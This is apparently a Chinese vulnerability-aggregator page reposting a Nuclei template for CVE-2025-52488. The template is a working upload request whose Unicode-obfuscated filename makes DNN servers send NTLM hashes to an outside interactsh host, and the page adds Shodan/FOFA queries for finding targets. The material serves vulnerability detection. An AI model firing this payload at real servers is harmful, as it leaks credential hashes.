CVE-2025-52488: DNN (DotNetNuke) - Unicode Path Normalization NTLM Hash Disclosure

日期: 2025-08-01 | 影响软件: DNN DotNetNuke | POC: 已公开

漏洞描述

DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. In versions 6.0.0 to before 10.0.1, DNN.PLATFORM allows a specially crafted series of malicious interaction to potentially expose NTLM hashes to a third party SMB server. This issue has been patched in version 10.0.1.

PoC代码[已公开]

id: CVE-2025-52488

info:
  name: DNN (DotNetNuke) - Unicode Path Normalization NTLM Hash Disclosure
  author: assetnote,DhiyaneshDk,iamnoooob,pdresearch
  severity: high
  description: |
    DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. In versions 6.0.0 to before 10.0.1, DNN.PLATFORM allows a specially crafted series of malicious interaction to potentially expose NTLM hashes to a third party SMB server. This issue has been patched in version 10.0.1.
  reference:
    - https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-mgfv-2362-jq96
    - https://slcyber.io/assetnote-security-research-center/abusing-windows-net-quirks-and-unicode-normalization-to-exploit-dnn-dotnetnuke/#hunting-variants
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2025-52488
    cwe-id: CWE-200
    cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:*
    epss-score: 0.35185
    epss-percentile: 0.96926
  metadata:
    verified: true
    max-request: 1
    vendor: dnnsoftware
    product: dotnetnuke
    shodan-query:
      - "Set-Cookie: dnn_IsMobile"
      - http.favicon.hash:-1465479343
    fofa-query:
      - app="dotnetnuke"
      - "Set-Cookie: dnn_IsMobile"
      - icon_hash="-1465479343"
  tags: cve,cve2025,file-upload,dotnetnuke,oast,oob,dnnsoftware,oss,ntlm,vkev

variables:
  payload: "%EF%BC%BC%EF%BC%BC{{interactsh-url}}%EF%BC%BC%EF%BC%BCc$%EF%BC%BC%EF%BC%BCan.jpg"

http:
  - raw:
      - |
        POST /Providers/HtmlEditorProviders/DNNConnect.CKE/Browser/FileUploader.ashx?PortalID=0&storageFolderID=1&overrideFiles=false HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXXXXXXXXXXXX

        ------WebKitFormBoundaryXXXXXXXXXXXX
        Content-Disposition: form-data; name="file"; filename="{{url_decode(replace(payload,'.','%EF%BC%8E'))}}"
        Content-Type: image/jpeg

        {{randstr}}
        ------WebKitFormBoundaryXXXXXXXXXXXX--

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

      - type: dsl
        dsl:
          - "contains(to_lower(header), 'dnn_ismobile')"
          - "contains_any(to_lower(body), 'dotnetnuke', 'dnnconnect', 'runtime error')"
        condition: or
# digest: 4b0a004830460221008b55a09670c839e492a5a50c9976e94faa76ca188748db6151a3c8a4966550da0221008aeec5157bb21bf0b1b02ae15c8517f4aa06470079a07da498b5493cab8a6bfb:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-52488.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

Wordpress Plugin Depicter /wp-admin/admin-ajax.php depicter-lead-list SQL 注入漏洞（CVE-2025-2011） 无POC

Wordpress Plugin Eventin /wp-admin/admin-ajax.php proxy_image 文件读取漏洞（CVE-2025-3419） 无POC

Wordpress Plugin Ultimate Auction Pro /wp-admin/admin-ajax.php uwa_see_more_bids_ajax SQL 注入漏洞 （CVE-2025-4204） 无POC

Flowise /api/v1/account/forgot-password 未授权访问漏洞（CVE-2025-58434） 无POC

Hoverfly 远程命令执行(CVE-2025-54123) 无POC

Wordpress Plugin Depicter /wp-admin/admin-ajax.php depicter-lead-list SQL 注入漏洞（CVE-2025-2011）无POC

Wordpress Plugin Eventin /wp-admin/admin-ajax.php proxy_image 文件读取漏洞（CVE-2025-3419）无POC

Wordpress Plugin Ultimate Auction Pro /wp-admin/admin-ajax.php uwa_see_more_bids_ajax SQL 注入漏洞（CVE-2025-4204）无POC

Flowise /api/v1/account/forgot-password 未授权访问漏洞（CVE-2025-58434）无POC